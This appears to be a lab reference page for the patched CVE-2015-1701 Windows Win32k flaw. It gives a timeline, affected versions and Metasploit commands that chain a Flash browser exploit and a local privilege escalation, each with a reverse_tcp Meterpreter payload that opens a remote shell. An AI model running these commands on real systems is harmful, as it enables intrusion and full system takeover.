CVE-2015-1701 Windows ClientCopyImage Win32k Exploit

Timeline :

Vulnerability discovered exploited in the wild by FireEye the 2015-04-13
Patch provided by the vendor via MS15-051 the 2015-05-12
PoC provided by hfiref0x the 2015-05-12
Metasploit PoC provided the 2015-06-03

PoC provided by :

Unknown
hfirefox
OJ Reeves
Spencer McIntyre

Reference(s) :

CVE-2015-1701
MS15-051

Affected version(s) :

Windows Server 2003 Service Pack 2
Windows Vista Service Pack 2
Windows Server 2008 Service Pack 2
Windows 7 Service Pack 1

Tested onĀ :

Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188 (CVE-2015-3105) for remote exploitation

Description :

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.

Commands :

Remote exploitation
use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

Local privileges escalation
use exploit/windows/local/ms15_051_client_copy_image
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4445
set SESSION 1
run

getuid